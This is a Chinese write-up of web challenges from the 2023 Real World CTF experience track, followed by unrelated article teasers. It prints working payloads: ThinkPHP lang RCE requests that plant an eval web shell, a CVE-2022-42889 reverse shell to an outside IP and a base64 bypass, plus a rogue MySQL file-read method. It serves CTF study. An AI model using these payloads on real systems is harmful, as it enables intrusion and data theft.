2023 Real World CTF体验赛部分Writeup

news/2025/1/11 14:13:43/

web1

在这里插入图片描述
Thinkphp lang多语言 RCE漏洞,直接打

GET /index.php?+config-create+/<?=eval($_REQUEST[1]);?>+/tmp/keep.php HTTP/1.1
Host: 47.98.124.175:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: think_lang=zh-cn
think-lang:../../../../../../../../usr/local/lib/php/pearcmd
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

在这里插入图片描述

GET /index.php?1=system('ls+/'); HTTP/1.1
Host: 47.98.124.175:8080
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Length: 2
think-lang:../../../../../../../../tmp/keep
Cookie: think_lang=zh-cn;
Connection: close

在这里插入图片描述
在这里插入图片描述

rwctf{PHP_1s_Th3_B3st_L@ngvag3_1n_the_w0r1d}

web2

是一个MySQL连接框
在这里插入图片描述

利用场景:

  1. 利用重装漏洞,读取目标服务器上的任意文件
  2. 利用目标的数据迁移等,能连接外部数据库的功能点,读取目标服务器上的任意文件
  3. 搭建在蜜罐上读取攻击者的信息,蓝队溯源/反制
    攻击流程:
  4. 受害者向攻击者提供的服务器发起请求,并尝试进行身份认证
  5. 攻击者的MySQL接受到受害者的连接请求,攻击者发送正常的问候、身份验证正确,并且向受害者的MySQL客户端请求文件。
  6. 受害者的MySQL客户端认为身份验证正确,执行攻击者的发来的请求,通过LOAD DATA INLINE 功能将文件内容发送回攻击者的MySQL服务器。
  7. 攻击者收到受害者服务器上的信息,读取文件成功,攻击完成。
    使用项目:https://github.com/rmb122/rogue_mysql_server
    修改项目配置文件,修改读取内容为/flag:
    在这里插入图片描述

监听Mysql服务:
在这里插入图片描述

提交所监听的地址和端口,以及用户信息
在这里插入图片描述

在这里插入图片描述
获取读取flag文件结果
在这里插入图片描述
rwctf{d041bd251adb4380b3e1dea2bd355f8f}

Web3

在这里插入图片描述

CVE-2022-42889,apache common textshell
尝试进行利用,发现过滤了常用的file script url dns
在这里插入图片描述

可以通过base64Decoder绕过
在这里插入图片描述
在这里插入图片描述

尝试通过base64编码绕过后,进行反弹shell

${script:javascript:java.lang.Runtime.getRuntime().exec("bash -c 'exec bash -i &>/dev/tcp/111.111.111.111/54321 <&1'")}

但是并没有成功,后面通过构造输入输出流去读取执行./readflag,得出flag

${script:javascript:new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("./readflag").getInputStream())).readLine()}

在这里插入图片描述

${base64Decoder:JHtzY3JpcHQ6amF2YXNjcmlwdDpuZXcgamF2YS5pby5CdWZmZXJlZFJlYWRlcihuZXcgamF2YS5pby5JbnB1dFN0cmVhbVJlYWRlcihqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiLi9yZWFkZmxhZyIpLmdldElucHV0U3RyZWFtKCkpKS5yZWFkTGluZSgpfQ==}

在这里插入图片描述

rwctf{rwctf_1terat1on_1s_4_g0od_des1gN_e5aa}

Web4

在这里插入图片描述

YApi 接口管理平台 up SQL注入漏洞,尝试通过NoSQL注入直接RCE
在这里插入图片描述
获取权限,尝试获取flag
在这里插入图片描述
在这里插入图片描述
rwctf{y0u_h4ve_f0und_yvmmy_@pi_f0r_c1ph3r_ch4ll3ng3s}

Web5

在这里插入图片描述
CVE-2022-26134 Atlassian Confluence远程代码执行漏洞,之前复现过,直接通过之前写的脚本getshell
在这里插入图片描述

rwctf{154fea37c0f14b519942931db23e89e8}


http://www.ppmy.cn/news/10481.html

相关文章

力扣sql入门篇(一)

力扣sql入门篇(一) 1 两人之间的通话天数 1.1 题目内容 1.1.1 基本题目信息 1.1.2 示例输入输出 1.2 示例sql语句 # 两个人之间的通话需要统计成一次 SELECT from_id person1,to_id person2,count(*) call_count,sum(duration) total_duration FROM Calls GROUP BY least(f…

Java之String概述、对象创建原理和常见面试题、String类常用API、案例

目录String、ArrayList前言String简单介绍Arraylist简单介绍String 概述String类的特点详解总结String类创建对象的两种方式两种方式有什么区别吗&#xff1f;总结String常见面试题String类常用API-字符串内容比较总结String类常用API-遍历、替换、截取、分割操作String案例验证…

Ansible 介绍与实战操作演示

文章目录一、概述二、Ansible 架构三、Ansible 工作原理四、Ansible 安装与基础配置1&#xff09;开启记录日志2&#xff09;去掉第一次连接ssh ask确认五、Ansible 的七个命令1&#xff09;ansible2&#xff09;ansible-doc3&#xff09;ansible-playbook4&#xff09;ansible…

数据库,计算机网络、操作系统刷题笔记28

数据库&#xff0c;计算机网络、操作系统刷题笔记28 2022找工作是学历、能力和运气的超强结合体&#xff0c;遇到寒冬&#xff0c;大厂不招人&#xff0c;可能很多算法学生都得去找开发&#xff0c;测开 测开的话&#xff0c;你就得学数据库&#xff0c;sql&#xff0c;oracle…

AtCoder Beginner Contest 284.(A--E)

AtCoder Beginner Contest 284A - Sequence of Strings1、问题2、代码B - Multi Test Cases1、问题2、代码C - Count Connected Components1、问题&#xff1a;2、思路&#xff1a;——并查集、DFS3、代码方法1&#xff1a;并查集方法2&#xff1a;DFSD - Happy New Year 20231…

Apache Hive 使用

Apache Hive 使用使用beeline 连接Apache Hive查看数据库使用或进入数据库创建表查看数据表上传数据数据操纵语言&#xff08;DML&#xff09;查询语句函数数学函数条件函数) 使用beeline 连接Apache Hive /export/server/apache-hive-3.1.2-bin/bin/beelinebeeline> ! co…

23届秋招,寒气逼人。。

本文已经收录到Github仓库&#xff0c;该仓库包含计算机基础、Java基础、多线程、JVM、数据库、Redis、Spring、Mybatis、SpringMVC、SpringBoot、分布式、微服务、设计模式、架构、校招社招分享等核心知识点&#xff0c;欢迎star~ Github地址&#xff1a;https://github.com/T…

Spring事务和事务传播机制

⭐️前言⭐️ 事务是作为一名后端程序员&#xff0c;必须去要了解清楚的东西&#xff0c;因为它决定了程序的正常运行以及与程序运行效率之间的权衡&#xff0c;这篇文章我们就来了解一下Spring事务和事务传播机制。 &#x1f349;欢迎点赞 &#x1f44d; 收藏 ⭐留言评论 &am…